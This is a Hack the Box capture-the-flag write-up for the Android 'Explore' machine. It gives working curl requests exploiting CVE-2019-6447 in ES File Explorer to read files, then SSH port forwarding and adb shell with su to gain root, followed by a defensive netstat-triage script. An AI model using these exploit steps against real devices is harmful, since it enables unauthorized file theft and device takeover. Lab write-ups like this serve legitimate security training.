Hack the Box - Explore

Write-up of Explore - Difficulty : Easy

1. Recon

rustscan -a $target --ulimit 5000

I’m lazy, so we can start off by setting our target and running rustscan. As always, don’t use rustscan on anything that you don’t want to make a ton of noise on, since it’s just nmap with no brakes.

Ports open are 2222/34401/59777. Port 2222 we already know is SSH on Android. First thing that comes up when researching port 59777 is an exploit. I’m not sure if it was supposed to be that simple but we might as well take a look at it. The exploit references CVE-2019-6447.

The GitHub page for the exploit-db script shows us how to use the exploit without having to run the Python script. The available commands can be found near the bottom, and they can be run with a simple curl POST request.

2. Exploit

First thing we should do is get the device info and make sure everything is working properly.
curl --header "Content-Type: application/json" --request POST --data '{"command":"getDeviceInfo"}' http://$target:59777

We can then list the files of the /sdcard that was called out.
curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://$target:59777/sdcard

Looks like user.txt is right in the sdcard root directory. We can probably just read that file without having to get user at all.
curl http://$target:59777/sdcard/user.txt

Next we’ll just have to do some regular recon of what’s on the sdcard. After a bit of poking around we wind up at DCIM, which has a few pictures in it.
curl --header "Content-Type: application/json" --request POST --data '{"command":"listFiles"}' http://$target:59777/sdcard/DCIM

Since we can’t view the images in a terminal window we’ll just have to use a web browser instead. Looks like someone took a picture of their login credentials so they wouldn’t forget them.

With these credentials we’re able to ssh into the box using port 2222. First thing we run is netstat to view what ports are listening.

3. Root

Android Debug Bridge is listening on local port 5555. Since we can’t access it directly we’ll have to use ssh port forwarding from our attack box. Then we can simply run adb connect and adb shell to get access to the debug command line. A simple su command and we have root access.

Port forward:
ssh -L 5555:localhost:5555 kristi@$target -p 2222

ADB:
adb connect localhost:5555
adb devices
adb -s localhost:5555 shell
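
From the defender's side, the same netstat output used above is enough to triage this device. The script below is an added example, not part of the original write-up: it rates the ports named on this page (59777 for the ES File Explorer HTTP service behind CVE-2019-6447, 5555 for ADB over TCP, 2222 for SSH) and treats loopback-only ADB as high risk whenever SSH is reachable, since port forwarding bridges that gap. The netstat lines are constructed, and `sample_netstat` and `audit_listeners` are hypothetical names.

```sh
#!/bin/sh
# Added example (not from the write-up): classify listeners from `netstat -tln` output.
# Ports 59777, 5555 and 2222 come from the write-up; the sample lines are constructed.

sample_netstat() {
cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp6       0      0 :::2222                 :::*                    LISTEN
tcp6       0      0 ::ffff:127.0.0.1:5555   :::*                    LISTEN
tcp6       0      0 :::59777                :::*                    LISTEN
tcp6       0      0 :::34401                :::*                    LISTEN
EOF
}

# Reads netstat output on stdin; prints "port scope severity note" per listener.
# $1 = SSH port (assumption: 2222, as on the box in the write-up).
audit_listeners() {
  awk -v ssh_port="${1:-2222}" '
    $NF != "LISTEN" { next }                  # skip header and non-listening sockets
    {
      port = $4; sub(/.*:/, "", port)         # text after the last colon
      host = $4; sub(/:[0-9]+$/, "", host)    # bind address without the port
      loop = (host ~ /(^|:)127\./ || host == "::1")
      n++; ports[n] = port; scope[n] = loop ? "loopback" : "exposed"
      if (port == ssh_port && !loop) ssh_exposed = 1
    }
    END {
      for (i = 1; i <= n; i++) {
        sev = "INFO"; note = "review whether this service is needed"
        if (ports[i] == "59777") {
          sev = (scope[i] == "exposed") ? "HIGH" : "MEDIUM"
          note = "ES File Explorer HTTP service (CVE-2019-6447): update or remove the app"
        } else if (ports[i] == "5555") {
          # Loopback-only ADB is still reachable by SSH users via port forwarding.
          sev = (scope[i] == "exposed" || ssh_exposed) ? "HIGH" : "MEDIUM"
          note = "ADB over TCP: disable network debugging"
        }
        print ports[i], scope[i], sev, note
      }
    }'
}

sample_netstat | audit_listeners 2222
```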

If this write-up was helpful consider leaving some respect on my HTB profile.